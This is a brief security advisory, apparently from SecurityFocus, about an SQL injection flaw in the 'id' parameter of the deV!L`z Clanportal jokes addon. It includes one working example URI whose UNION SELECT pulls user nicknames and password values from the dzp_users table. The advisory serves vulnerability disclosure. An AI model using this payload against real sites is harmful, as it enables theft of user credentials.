deV!L`z Clanportal Witze Addon 'id' Parameter SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URI is available:

http://www.example.com/ jokes/index.php?action=show&id=9999999999999999999999999999+union+select+1,1,nick,pwd,1,1+from+dzp_users+where+id=1--+


 

Privacy Statement
Copyright 2010, SecurityFocus